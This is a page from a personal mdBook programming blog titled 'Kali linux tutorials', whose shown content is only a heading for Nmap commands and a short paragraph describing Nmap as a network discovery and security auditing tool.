<!DOCTYPE HTML>
<html lang="en" class="sidebar-visible no-js coal">
    <head>
        <!-- Book generated using mdBook -->
        <meta charset="UTF-8">
        <title>Kali linux tutorials - Andrew&#x27;s Blog</title>


        <!-- Custom HTML head -->
        
        <meta name="description" content="Andrew Ryan&#x27;s Blog">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <meta name="theme-color" content="#ffffff" />

        <link rel="icon" href="../../favicon.svg">
        <link rel="shortcut icon" href="../../favicon.png">
        <link rel="stylesheet" href="../../css/variables.css">
        <link rel="stylesheet" href="../../css/general.css">
        <link rel="stylesheet" href="../../css/chrome.css">

        <!-- Fonts -->
        <link rel="stylesheet" href="../../FontAwesome/css/font-awesome.css">
        <link rel="stylesheet" href="../../fonts/fonts.css">

        <!-- Highlight.js Stylesheets -->
        <link rel="stylesheet" href="../../highlight.css">
        <link rel="stylesheet" href="../../tomorrow-night.css">
        <link rel="stylesheet" href="../../ayu-highlight.css">

        <!-- Custom theme stylesheets -->
        <link rel="stylesheet" href="../../src/style/custom.css">

        <!-- MathJax -->
        <script async src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script>
    </head>
    <body>
    <div id="body-container">
        <!-- Provide site root to javascript -->
        <script>
            var path_to_root = "../../";
            var default_theme = window.matchMedia("(prefers-color-scheme: dark)").matches ? "coal" : "coal";
        </script>

        <!-- Work around some values being stored in localStorage wrapped in quotes -->
        <script>
            try {
                var theme = localStorage.getItem('mdbook-theme');
                var sidebar = localStorage.getItem('mdbook-sidebar');

                if (theme.startsWith('"') && theme.endsWith('"')) {
                    localStorage.setItem('mdbook-theme', theme.slice(1, theme.length - 1));
                }

                if (sidebar.startsWith('"') && sidebar.endsWith('"')) {
                    localStorage.setItem('mdbook-sidebar', sidebar.slice(1, sidebar.length - 1));
                }
            } catch (e) { }
        </script>

        <!-- Set the theme before any content is loaded, prevents flash -->
        <script>
            var theme;
            try { theme = localStorage.getItem('mdbook-theme'); } catch(e) { }
            if (theme === null || theme === undefined) { theme = default_theme; }
            var html = document.querySelector('html');
            html.classList.remove('no-js')
            html.classList.remove('coal')
            html.classList.add(theme);
            html.classList.add('js');
        </script>

        <!-- Hide / unhide sidebar before it is displayed -->
        <script>
            var html = document.querySelector('html');
            var sidebar = null;
            if (document.body.clientWidth >= 1080) {
                try { sidebar = localStorage.getItem('mdbook-sidebar'); } catch(e) { }
                sidebar = sidebar || 'visible';
            } else {
                sidebar = 'hidden';
            }
            html.classList.remove('sidebar-visible');
            html.classList.add("sidebar-" + sidebar);
        </script>

        <nav id="sidebar" class="sidebar" aria-label="Table of contents">
            <div class="sidebar-scrollbox">
                <ol class="chapter"><li class="chapter-item affix "><a href="../../index.html">Andrew's Blog</a></li><li class="chapter-item "><a href="../../posts/linux/linux.html"><strong aria-hidden="true">1.</strong> Linux</a><a class="toggle"><div>❱</div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/linux/install_linux.html"><strong aria-hidden="true">1.1.</strong> install linux</a></li><li class="chapter-item "><a href="../../posts/linux/bash_profile.html"><strong aria-hidden="true">1.2.</strong> bash profile</a></li><li class="chapter-item "><a href="../../posts/linux/command_list.html"><strong aria-hidden="true">1.3.</strong> command list</a></li><li class="chapter-item "><a href="../../posts/linux/git_guide.html"><strong aria-hidden="true">1.4.</strong> git guide</a></li><li class="chapter-item "><a href="../../posts/linux/tar.html"><strong aria-hidden="true">1.5.</strong> tar</a></li><li class="chapter-item "><a href="../../posts/Linux/git_cheatsheet.html"><strong aria-hidden="true">1.6.</strong> Git Cheatsheet</a></li><li class="chapter-item "><a href="../../posts/Linux/bash_cheatsheet.html"><strong aria-hidden="true">1.7.</strong> Bash Cheatsheet</a></li></ol></li><li class="chapter-item "><a href="../../posts/macos/mac.html"><strong aria-hidden="true">2.</strong> MacOS</a><a class="toggle"><div>❱</div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/macos/macos_profiles.html"><strong aria-hidden="true">2.1.</strong> macos profiles</a></li><li class="chapter-item "><a href="../../posts/macos/macos_pwn_env_setup.html"><strong aria-hidden="true">2.2.</strong> macos pwn env setup</a></li></ol></li><li class="chapter-item "><a href="../../posts/swift/swift.html"><strong aria-hidden="true">3.</strong> Swift</a><a class="toggle"><div>❱</div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/swift/learn_swift.html"><strong aria-hidden="true">3.1.</strong> learn swift basics</a></li><li class="chapter-item "><a href="../../posts/swift/swift_extensions.html"><strong aria-hidden="true">3.2.</strong> Swift extensions</a></li><li class="chapter-item "><a href="../../posts/swift/swiftui_extension.html"><strong aria-hidden="true">3.3.</strong> SwiftUI extensions</a></li><li class="chapter-item "><a href="../../posts/swift/install_swift.html"><strong aria-hidden="true">3.4.</strong> install swift</a></li><li class="chapter-item "><a href="../../posts/swift/task_planner.html"><strong aria-hidden="true">3.5.</strong> implment task panner app with SwiftUI</a></li><li class="chapter-item "><a href="../../posts/swift/swift_cheat_sheet.html"><strong aria-hidden="true">3.6.</strong> Swift Cheat Sheet</a></li><li class="chapter-item "><a href="../../posts/swift/yinci_url.html"><strong aria-hidden="true">3.7.</strong> Personal privacy protocol</a></li><li class="chapter-item "><a href="../../posts/swift/swift_regular_exressions.html"><strong aria-hidden="true">3.8.</strong> Swift regular exressions</a></li><li class="chapter-item "><a href="../../posts/ios/how_to_create_beautiful_ios_charts_in_swift.html"><strong aria-hidden="true">3.9.</strong> How to Create Beautiful iOS Charts in Swift</a></li><li class="chapter-item "><a href="../../posts/swift/swiftui_source_code.html"><strong aria-hidden="true">3.10.</strong> SwiftUI source code</a></li><li class="chapter-item "><a href="../../posts/swift/use_swift_fetch_iciba_api.html"><strong aria-hidden="true">3.11.</strong> use swift fetch iciba API</a></li></ol></li><li class="chapter-item "><a href="../../posts/ios/ios.html"><strong aria-hidden="true">4.</strong> iOS</a><a class="toggle"><div>❱</div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/ios/cocaposd_setup_and_install_for_ios_project.html"><strong aria-hidden="true">4.1.</strong> cocaposd setup and install for ios project</a></li><li class="chapter-item "><a href="../../posts/ios/swiftui_show_gif_image.html"><strong aria-hidden="true">4.2.</strong> SwiftUI show gif image</a></li><li class="chapter-item "><a href="../../posts/ios/implement_task_planner_app.html"><strong aria-hidden="true">4.3.</strong> implement Task planner App</a></li></ol></li><li class="chapter-item "><a href="../../posts/objective_c/objective_c.html"><strong aria-hidden="true">5.</strong> Objective-C</a><a class="toggle"><div>❱</div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/objective_c/objective_c_cheat_sheet.html"><strong aria-hidden="true">5.1.</strong> Objective-C Cheat Sheet</a></li><li class="chapter-item "><a href="../../posts/objective_c/objective_c_for_absolute_beginners_read_note.html"><strong aria-hidden="true">5.2.</strong> Objective-C Note</a></li></ol></li><li class="chapter-item "><a href="../../posts/dart/dart.html"><strong aria-hidden="true">6.</strong> Dart</a><a class="toggle"><div>❱</div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/dart/flutter.html"><strong aria-hidden="true">6.1.</strong> Flutter Cheat Sheet</a></li><li class="chapter-item "><a href="../../posts/dart/dart_cheat_sheet.html"><strong aria-hidden="true">6.2.</strong> Dart Cheat Sheet</a></li><li class="chapter-item "><a href="../../posts/flutter/flutter_dev_test.html"><strong aria-hidden="true">6.3.</strong> Flutter dev test</a></li></ol></li><li class="chapter-item "><a href="../../posts/rust/rust.html"><strong aria-hidden="true">7.</strong> Rust</a><a class="toggle"><div>❱</div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/rust/offline_use_rust.html"><strong aria-hidden="true">7.1.</strong> Offline use rust</a></li><li class="chapter-item "><a href="../../posts/rust/rust_grammer.html"><strong aria-hidden="true">7.2.</strong> rust grammar</a></li><li class="chapter-item "><a href="../../posts/rust/pase_string_and_decimal_conversion.html"><strong aria-hidden="true">7.3.</strong> pase string and decimal conversion</a></li><li class="chapter-item "><a href="../../posts/rust/parse_types.html"><strong aria-hidden="true">7.4.</strong> rust types</a></li><li class="chapter-item "><a href="../../posts/rust/rust_life_cycle.html"><strong aria-hidden="true">7.5.</strong> Rust life cycle</a></li><li class="chapter-item "><a href="../../posts/rust/rust_generic.html"><strong aria-hidden="true">7.6.</strong> rust generics</a></li><li class="chapter-item "><a href="../../posts/rust/rust_implment_matrix.html"><strong aria-hidden="true">7.7.</strong> Rust implement matrix</a></li><li class="chapter-item "><a href="../../posts/rust/rust_sort.html"><strong aria-hidden="true">7.8.</strong> Rust implement sort algorithms</a></li><li class="chapter-item "><a href="../../posts/rust/implement_aes_encryption.html"><strong aria-hidden="true">7.9.</strong> Rust implement AEC encryption and decryption</a></li><li class="chapter-item "><a href="../../posts/rust/implement_trie_data_structure.html"><strong aria-hidden="true">7.10.</strong> implement trie data structure</a></li><li class="chapter-item "><a href="../../posts/rust/rust_implement_tree.html"><strong aria-hidden="true">7.11.</strong> implement tree data_structure</a></li><li class="chapter-item "><a href="../../posts/rust/list_dir.html"><strong aria-hidden="true">7.12.</strong> list dir</a></li><li class="chapter-item "><a href="../../posts/rust/fast_way_to_implment_object_trait.html"><strong aria-hidden="true">7.13.</strong> fast way to implment object trait</a></li><li class="chapter-item "><a href="../../posts/rust/compress_rust_binary_size.html"><strong aria-hidden="true">7.14.</strong> compress rust binary size</a></li><li class="chapter-item "><a href="../../posts/rust/implment_file_upload_backend.html"><strong aria-hidden="true">7.15.</strong> impliment file upload</a></li><li class="chapter-item "><a href="../../posts/rust/this_is_add_post_cli_implementation_in_rust.html"><strong aria-hidden="true">7.16.</strong> this is add_post cli implementation in rust</a></li><li class="chapter-item "><a href="../../posts/rust/use_rust_implment_a_copyclipbord_cli.html"><strong aria-hidden="true">7.17.</strong> Use rust implment a copyclipbord CLI</a></li><li class="chapter-item "><a href="../../posts/rust/sqlite_database_add_delete_update_show_in_rust.html"><strong aria-hidden="true">7.18.</strong> sqlite database add delete update show in rust</a></li><li class="chapter-item "><a href="../../posts/rust/implementing_tokio_joinhandle_for_wasm.html"><strong aria-hidden="true">7.19.</strong> Implementing tokio JoinHandle for wasm</a></li><li class="chapter-item "><a href="../../posts/rust/rust_implement_a_crate_for_encode_and_decode_brainfuck_and_ook.html"><strong aria-hidden="true">7.20.</strong> rust implement a crate for encode and decode brainfuck and ook</a></li><li class="chapter-item "><a href="../../posts/rust/slint_builtin_elements.html"><strong aria-hidden="true">7.21.</strong> Slint Builtin Elements</a></li><li class="chapter-item "><a href="../../posts/rust/corporate_network_install_rust_on_windows.html"><strong aria-hidden="true">7.22.</strong> Corporate network install Rust on windows</a></li><li class="chapter-item "><a href="../../posts/rust/rust_binary_file_how_to_judge_static_link_or_dynamic_link_in_macos.html"><strong aria-hidden="true">7.23.</strong> rust binary file how to judge static link or dynamic link in Macos</a></li><li class="chapter-item "><a href="../../posts/rust/rust_binary_include_dir_and_get_contents.html"><strong aria-hidden="true">7.24.</strong> rust binary include dir and get contents</a></li><li class="chapter-item "><a href="../../posts/rust/how_to_create_yolov8_based_object_detection_web_service_using_python,_julia,_node.js,_javascript,_go_and_rust.html"><strong aria-hidden="true">7.25.</strong> How to create YOLOv8-based object detection web service using Python, Julia, Node.js, JavaScript, Go and Rust</a></li><li class="chapter-item "><a href="../../posts/rust/implment_builder_proc_macro_for_command_struct.html"><strong aria-hidden="true">7.26.</strong> implment Builder proc-macro for Command struct</a></li></ol></li><li class="chapter-item "><a href="../../posts/java/java.html"><strong aria-hidden="true">8.</strong> Java</a><a class="toggle"><div>❱</div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/java/java_grammar.html"><strong aria-hidden="true">8.1.</strong> java grammar and codewar</a></li><li class="chapter-item "><a href="../../posts/java/run_jar.html"><strong aria-hidden="true">8.2.</strong> java run .jar</a></li><li class="chapter-item "><a href="../../posts/java/java_pomxml_add_defaultgoal_to_build.html"><strong aria-hidden="true">8.3.</strong> Java pomxml add defaultGoal to build</a></li><li class="chapter-item "><a href="../../posts/java/java_set_mvn_mirror.html"><strong aria-hidden="true">8.4.</strong> Java set mvn mirror</a></li></ol></li><li class="chapter-item "><a href="../../posts/python/python.html"><strong aria-hidden="true">9.</strong> Python</a><a class="toggle"><div>❱</div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/python/convert_pesn.html"><strong aria-hidden="true">9.1.</strong> convert pesn</a></li><li class="chapter-item "><a href="../../posts/python/find_remove_dir.html"><strong aria-hidden="true">9.2.</strong> find and remove dir</a></li><li class="chapter-item "><a href="../../posts/python/timing_message.html"><strong aria-hidden="true">9.3.</strong> wechat send message</a></li><li class="chapter-item "><a href="../../posts/python/use_python_openpyxl_package_read_and_edit_excel_files.html"><strong aria-hidden="true">9.4.</strong> Use python openpyxl package read and edit excel files</a></li><li class="chapter-item "><a href="../../posts/python/sanctum_model_yaml.html"><strong aria-hidden="true">9.5.</strong> sanctum model yaml</a></li><li class="chapter-item "><a href="../../posts/python/how_to_detect_objects_on_images_using_the_yolov8_neural_network.html"><strong aria-hidden="true">9.6.</strong> How to detect objects on images using the YOLOv8 neural network</a></li><li class="chapter-item "><a href="../../posts/python/use_huggingface_model.html"><strong aria-hidden="true">9.7.</strong> use huggingface model</a></li></ol></li><li class="chapter-item "><a href="../../posts/go/go.html"><strong aria-hidden="true">10.</strong> Go</a></li><li class="chapter-item "><a href="../../posts/javascript/js.html"><strong aria-hidden="true">11.</strong> Javascript</a><a class="toggle"><div>❱</div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/javascript/js_tutorial.html"><strong aria-hidden="true">11.1.</strong> js tutorial</a></li><li class="chapter-item "><a href="../../posts/javascript/js_tutorial_map.html"><strong aria-hidden="true">11.2.</strong> ja map</a></li><li class="chapter-item "><a href="../../posts/javascript/js_tutorial_math.html"><strong aria-hidden="true">11.3.</strong> js math</a></li><li class="chapter-item "><a href="../../posts/javascript/js_tutorial_object.html"><strong aria-hidden="true">11.4.</strong> js object</a></li><li class="chapter-item "><a href="../../posts/javascript/js_tutorial_set.html"><strong aria-hidden="true">11.5.</strong> js set</a></li><li class="chapter-item "><a href="../../posts/javascript/single_thread_and_asynchronous.html"><strong aria-hidden="true">11.6.</strong> single thread and asynchronous</a></li><li class="chapter-item "><a href="../../posts/javascript/this.html"><strong aria-hidden="true">11.7.</strong> js this</a></li><li class="chapter-item "><a href="../../posts/javascript/js_implment_aes.html"><strong aria-hidden="true">11.8.</strong> js implment aes</a></li><li class="chapter-item "><a href="../../posts/javascript/getting_started_with_ajax.html"><strong aria-hidden="true">11.9.</strong> getting started with ajax</a></li><li class="chapter-item "><a href="../../posts/javascript/BinarySearchTree.html"><strong aria-hidden="true">11.10.</strong> binary search tree</a></li><li class="chapter-item "><a href="../../posts/javascript/goole_zx.html"><strong aria-hidden="true">11.11.</strong> goole zx</a></li><li class="chapter-item "><a href="../../posts/javascript/es6.html"><strong aria-hidden="true">11.12.</strong> es6</a></li></ol></li><li class="chapter-item "><a href="../../posts/ruby/ruby.html"><strong aria-hidden="true">12.</strong> Ruby</a><a class="toggle"><div>❱</div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/ruby/rails_setup_env.html"><strong aria-hidden="true">12.1.</strong> ruby on rails setup environment</a></li><li class="chapter-item "><a href="../../posts/ruby/learn_ruby.html"><strong aria-hidden="true">12.2.</strong> learn ruby</a></li><li class="chapter-item "><a href="../../posts/ruby/ruby_note.html"><strong aria-hidden="true">12.3.</strong> Ruby Note</a></li><li class="chapter-item "><a href="../../posts/ruby/setup_ruby_for_ctf.html"><strong aria-hidden="true">12.4.</strong> Setup ruby for CTF</a></li></ol></li><li class="chapter-item "><a href="../../posts/react/react.html"><strong aria-hidden="true">13.</strong> React</a><a class="toggle"><div>❱</div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/react/react_life_cycle.html"><strong aria-hidden="true">13.1.</strong> react life cycle</a></li><li class="chapter-item "><a href="../../posts/react/react_router.html"><strong aria-hidden="true">13.2.</strong> react router</a></li><li class="chapter-item "><a href="../../posts/react/react_this.html"><strong aria-hidden="true">13.3.</strong> react this</a></li><li class="chapter-item "><a href="../../posts/react/react_interviw.html"><strong aria-hidden="true">13.4.</strong> react interview</a></li><li class="chapter-item "><a href="../../posts/react/important_react_interview.html"><strong aria-hidden="true">13.5.</strong> important react interview</a></li><li class="chapter-item "><a href="../../posts/react/react_quick_reference.html"><strong aria-hidden="true">13.6.</strong> react quick reference</a></li><li class="chapter-item "><a href="../../posts/react/redux_quick_reference.html"><strong aria-hidden="true">13.7.</strong> redux quick reference</a></li></ol></li><li class="chapter-item "><a href="../../posts/vue/vue.html"><strong aria-hidden="true">14.</strong> Vue</a><a class="toggle"><div>❱</div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/vue/vue_ajax.html"><strong aria-hidden="true">14.1.</strong> vue ajax</a></li></ol></li><li class="chapter-item "><a href="../../posts/angular/angular.html"><strong aria-hidden="true">15.</strong> Angular</a><a class="toggle"><div>❱</div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/angular/controller_communication.html"><strong aria-hidden="true">15.1.</strong> controller communication</a></li><li class="chapter-item "><a href="../../posts/angular/creating_custom_directives.html"><strong aria-hidden="true">15.2.</strong> creating custom directives</a></li><li class="chapter-item "><a href="../../posts/angular/directive_notes.html"><strong aria-hidden="true">15.3.</strong> directive notes</a></li><li class="chapter-item "><a href="../../posts/angular/directive_communication.html"><strong aria-hidden="true">15.4.</strong> directive communication</a></li><li class="chapter-item "><a href="../../posts/angular/post_params.html"><strong aria-hidden="true">15.5.</strong> post params</a></li><li class="chapter-item "><a href="../../posts/angular/read_json_angular.html"><strong aria-hidden="true">15.6.</strong> read json angular</a></li><li class="chapter-item "><a href="../../posts/angular/same_route_reload.html"><strong aria-hidden="true">15.7.</strong> same route reload</a></li></ol></li><li class="chapter-item "><a href="../../posts/css/css.html"><strong aria-hidden="true">16.</strong> Css</a><a class="toggle"><div>❱</div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/css/use_css_media.html"><strong aria-hidden="true">16.1.</strong> use css media</a></li></ol></li><li class="chapter-item "><a href="../../posts/php/php.html"><strong aria-hidden="true">17.</strong> Php</a><a class="toggle"><div>❱</div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/php/for_php_string_implment_some_extemtion_functions.html"><strong aria-hidden="true">17.1.</strong> for php string implment some extemtion functions</a></li><li class="chapter-item "><a href="../../posts/php/php_cheatsheet.html"><strong aria-hidden="true">17.2.</strong> PHP cheatsheet</a></li></ol></li><li class="chapter-item "><a href="../../posts/windows/windows.html"><strong aria-hidden="true">18.</strong> Windows</a><a class="toggle"><div>❱</div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/windows/windows.html"><strong aria-hidden="true">18.1.</strong> Windows</a></li><li class="chapter-item "><a href="../../posts/windows/windows10_use_powershell_dedup_redundent_path.html"><strong aria-hidden="true">18.2.</strong> Windows10 use PowerShell dedup redundent PATH</a></li></ol></li><li class="chapter-item "><a href="../../posts/leetcode/leetcode.html"><strong aria-hidden="true">19.</strong> Leetcode</a><a class="toggle"><div>❱</div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/leetcode/rust_leetcode.html"><strong aria-hidden="true">19.1.</strong> rust leetcode</a></li><li class="chapter-item "><a href="../../posts/leetcode/rust_codewar.html"><strong aria-hidden="true">19.2.</strong> rust codewar</a></li><li class="chapter-item "><a href="../../posts/leetcode/swift_codewar.html"><strong aria-hidden="true">19.3.</strong> swift codewar</a></li><li class="chapter-item "><a href="../../posts/leetcode/js_leetcode.html"><strong aria-hidden="true">19.4.</strong> js leetcode</a></li><li class="chapter-item "><a href="../../posts/leetcode/java_leetcode.html"><strong aria-hidden="true">19.5.</strong> java leetcode</a></li><li class="chapter-item "><a href="../../posts/leetcode/rust_huawei.html"><strong aria-hidden="true">19.6.</strong> huawei test</a></li><li class="chapter-item "><a href="../../posts/leetcode/rust_utils.html"><strong aria-hidden="true">19.7.</strong> rust common functions</a></li><li class="chapter-item "><a href="../../posts/leetcode/olympiad_training.html"><strong aria-hidden="true">19.8.</strong> Computer olympiad training</a></li></ol></li><li class="chapter-item expanded "><a href="../../posts/ctf/CTF.html"><strong aria-hidden="true">20.</strong> CTF</a><a class="toggle"><div>❱</div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/ctf/CTF_Note.html"><strong aria-hidden="true">20.1.</strong> CTF Note</a></li><li class="chapter-item "><a href="../../posts/ctf/0.1_Web.html"><strong aria-hidden="true">20.2.</strong> Web</a></li><li class="chapter-item "><a href="../../posts/ctf/4.1_Misc.html"><strong aria-hidden="true">20.3.</strong> Misc</a></li><li class="chapter-item "><a href="../../posts/ctf/3.2_PWN_note.html"><strong aria-hidden="true">20.4.</strong> PWN</a></li><li class="chapter-item "><a href="../../posts/ctf/3.1_Crypto.html"><strong aria-hidden="true">20.5.</strong> Crypto</a></li><li class="chapter-item "><a href="../../posts/ctf/3.4_RSA_note.html"><strong aria-hidden="true">20.6.</strong> Rsa attack</a></li><li class="chapter-item "><a href="../../posts/ctf/3.5_Base64.html"><strong aria-hidden="true">20.7.</strong> Base64</a></li><li class="chapter-item "><a href="../../posts/ctf/0.0_SQL Injection Cheatsheet.html"><strong aria-hidden="true">20.8.</strong> SQL Injection Cheatsheet</a></li><li class="chapter-item "><a href="../../posts/ctf/1.1_SQL_injection.html"><strong aria-hidden="true">20.9.</strong> SQL Injection</a></li><li class="chapter-item "><a href="../../posts/ctf/1.2_SQL_injection_UNION_attacks.html"><strong aria-hidden="true">20.10.</strong> SQL Injection UNION attacks</a></li><li class="chapter-item "><a href="../../posts/ctf/1.3_Blind SQL injection.html"><strong aria-hidden="true">20.11.</strong> Blind SQL Injection</a></li><li class="chapter-item "><a href="../../posts/ctf/1.4_Code Injection.html"><strong aria-hidden="true">20.12.</strong> Code Injection</a></li><li class="chapter-item "><a href="../../posts/ctf/1.5_SSRF.html"><strong aria-hidden="true">20.13.</strong> SSRF</a></li><li class="chapter-item "><a href="../../posts/ctf/1.6_OS command injection.html"><strong aria-hidden="true">20.14.</strong> OS command injection</a></li><li class="chapter-item "><a href="../../posts/ctf/1.7_Local file inclusion.html"><strong aria-hidden="true">20.15.</strong> Local file inclusion</a></li><li class="chapter-item "><a href="../../posts/ctf/1.8_Remote file inclusion.html"><strong aria-hidden="true">20.16.</strong> Remote file inclusion</a></li><li class="chapter-item "><a href="../../posts/ctf/1.9_CSRFm.html"><strong aria-hidden="true">20.17.</strong> CSRF</a></li><li class="chapter-item "><a href="../../posts/ctf/1.10_NoSQL injection.html"><strong aria-hidden="true">20.18.</strong> NoSQL injection</a></li><li class="chapter-item "><a href="../../posts/ctf/1.11_JSON injection.html"><strong aria-hidden="true">20.19.</strong> JSON injection</a></li><li class="chapter-item "><a href="../../posts/ctf/1.12_CTF_Web_SQL_Note.html"><strong aria-hidden="true">20.20.</strong> CTF Web SQL Note</a></li><li class="chapter-item "><a href="../../posts/ctf/2.1_XXE.html"><strong aria-hidden="true">20.21.</strong> XXE</a></li><li class="chapter-item "><a href="../../posts/ctf/2.2_XSS.html"><strong aria-hidden="true">20.22.</strong> XSS</a></li><li class="chapter-item "><a href="../../posts/ctf/2.3_Upload File.html"><strong aria-hidden="true">20.23.</strong> Upload File</a></li><li class="chapter-item "><a href="../../posts/ctf/2.4_serialize_unserialize.html"><strong aria-hidden="true">20.24.</strong> serialize unserialize</a></li><li class="chapter-item "><a href="../../posts/ctf/2.5_Race condition.html"><strong aria-hidden="true">20.25.</strong> Race condition</a></li><li class="chapter-item "><a href="../../posts/ctf/zip_plain_text_attack.html"><strong aria-hidden="true">20.26.</strong> Zip plain text attack</a></li><li class="chapter-item "><a href="../../posts/ctf/3.3_pwn HCTF2016 brop.html"><strong aria-hidden="true">20.27.</strong> pwn HCTF2016 brop</a></li><li class="chapter-item "><a href="../../posts/ctf/pwn_patch_defense_skill.html"><strong aria-hidden="true">20.28.</strong> PWN Patch defense skill</a></li><li class="chapter-item "><a href="../../posts/ctf/pwn_stack_overflow.html"><strong aria-hidden="true">20.29.</strong> PWN stack overflow</a></li><li class="chapter-item "><a href="../../posts/ctf/pwn_heap_overflow.html"><strong aria-hidden="true">20.30.</strong> PWN heap overflow</a></li><li class="chapter-item "><a href="../../posts/ctf/pwn_format_string_vulnerability.html"><strong aria-hidden="true">20.31.</strong> PWN Format String Vulnerability</a></li><li class="chapter-item expanded "><a href="../../posts/ctf/kali_linux_tutorials.html" class="active"><strong aria-hidden="true">20.32.</strong> Kali linux tutorials</a></li><li class="chapter-item "><a href="../../posts/ctf/google_dorks_2023_lists.html"><strong aria-hidden="true">20.33.</strong> Google Dorks 2023 Lists</a></li><li class="chapter-item "><a href="../../posts/ctf/dvwa_writeup.html"><strong aria-hidden="true">20.34.</strong> DVWA WriteUp</a></li><li class="chapter-item "><a href="../../posts/ctf/bwapp_writeup.html"><strong aria-hidden="true">20.35.</strong> bWAPP WriteUp</a></li><li class="chapter-item "><a href="../../posts/ctf/sqlilabs_writeup.html"><strong aria-hidden="true">20.36.</strong> sqlilabs WriteUp</a></li><li class="chapter-item "><a href="../../posts/ctf/pwnable_kr_challenge.html"><strong aria-hidden="true">20.37.</strong> Solutions for pwnable.kr</a></li><li class="chapter-item "><a href="../../posts/ctf/the_periodic_table.html"><strong aria-hidden="true">20.38.</strong> The Periodic Table</a></li><li class="chapter-item "><a href="../../posts/ctf/pwntools_cheatsheet.html"><strong aria-hidden="true">20.39.</strong> Pwntools Cheatsheet</a></li><li class="chapter-item "><a href="../../posts/ctf/gdb_cheatsheet.html"><strong aria-hidden="true">20.40.</strong> GDB Cheatsheet</a></li></ol></li><li class="chapter-item "><a href="../../posts/iltes/iltes.html"><strong aria-hidden="true">21.</strong> ILTES</a><a class="toggle"><div>❱</div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/iltes/iltes_writing.html"><strong aria-hidden="true">21.1.</strong> ILTES Writing</a></li></ol></li></ol>
            </div>
            <div id="sidebar-resize-handle" class="sidebar-resize-handle"></div>
        </nav>

        <!-- Track and set sidebar scroll position -->
        <script>
            var sidebarScrollbox = document.querySelector('#sidebar .sidebar-scrollbox');
            sidebarScrollbox.addEventListener('click', function(e) {
                if (e.target.tagName === 'A') {
                    sessionStorage.setItem('sidebar-scroll', sidebarScrollbox.scrollTop);
                }
            }, { passive: true });
            var sidebarScrollTop = sessionStorage.getItem('sidebar-scroll');
            sessionStorage.removeItem('sidebar-scroll');
            if (sidebarScrollTop) {
                // preserve sidebar scroll position when navigating via links within sidebar
                sidebarScrollbox.scrollTop = sidebarScrollTop;
            } else {
                // scroll sidebar to current active section when navigating via "next/previous chapter" buttons
                var activeSection = document.querySelector('#sidebar .active');
                if (activeSection) {
                    activeSection.scrollIntoView({ block: 'center' });
                }
            }
        </script>

        <div id="page-wrapper" class="page-wrapper">

            <div class="page">
                                <div id="menu-bar-hover-placeholder"></div>
                <div id="menu-bar" class="menu-bar sticky">
                    <div class="left-buttons">
                        <button id="sidebar-toggle" class="icon-button" type="button" title="Toggle Table of Contents" aria-label="Toggle Table of Contents" aria-controls="sidebar">
                            <i class="fa fa-bars"></i>
                        </button>
                        <button id="theme-toggle" class="icon-button" type="button" title="Change theme" aria-label="Change theme" aria-haspopup="true" aria-expanded="false" aria-controls="theme-list">
                            <i class="fa fa-paint-brush"></i>
                        </button>
                        <ul id="theme-list" class="theme-popup" aria-label="Themes" role="menu">
                            <li role="none"><button role="menuitem" class="theme" id="light">Light</button></li>
                            <li role="none"><button role="menuitem" class="theme" id="rust">Rust</button></li>
                            <li role="none"><button role="menuitem" class="theme" id="coal">Coal</button></li>
                            <li role="none"><button role="menuitem" class="theme" id="navy">Navy</button></li>
                            <li role="none"><button role="menuitem" class="theme" id="ayu">Ayu</button></li>
                        </ul>
                        <button id="search-toggle" class="icon-button" type="button" title="Search. (Shortkey: s)" aria-label="Toggle Searchbar" aria-expanded="false" aria-keyshortcuts="S" aria-controls="searchbar">
                            <i class="fa fa-search"></i>
                        </button>
                    </div>

                    <h1 class="menu-title">Andrew&#x27;s Blog</h1>

                    <div class="right-buttons">
                        <a href="https://gitee.com/dnrops/dnrops" title="Git repository" aria-label="Git repository">
                            <i id="git-repository-button" class="fa fa-github"></i>
                        </a>

                    </div>
                </div>

                <div id="search-wrapper" class="hidden">
                    <form id="searchbar-outer" class="searchbar-outer">
                        <input type="search" id="searchbar" name="searchbar" placeholder="Search this book ..." aria-controls="searchresults-outer" aria-describedby="searchresults-header">
                    </form>
                    <div id="searchresults-outer" class="searchresults-outer hidden">
                        <div id="searchresults-header" class="searchresults-header"></div>
                        <ul id="searchresults">
                        </ul>
                    </div>
                </div>

                <!-- Apply ARIA attributes after the sidebar and the sidebar toggle button are added to the DOM -->
                <script>
                    document.getElementById('sidebar-toggle').setAttribute('aria-expanded', sidebar === 'visible');
                    document.getElementById('sidebar').setAttribute('aria-hidden', sidebar !== 'visible');
                    Array.from(document.querySelectorAll('#sidebar a')).forEach(function(link) {
                        link.setAttribute('tabIndex', sidebar === 'visible' ? 0 : -1);
                    });
                </script>

                <div id="content" class="content">
                    <main>
                        <h1 id="kali-linux-tutorials"><a class="header" href="#kali-linux-tutorials">Kali linux tutorials</a></h1>
<p style="display:flex;
    align-items: center;
    justify-content: end;
">Pub Date: 2023-07-31</p>
<h3 id="nmap-commands"><a class="header" href="#nmap-commands">NMAP Commands</a></h3>
<p>Nmap (“Network Mapper”) is a free and open source utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.</p>
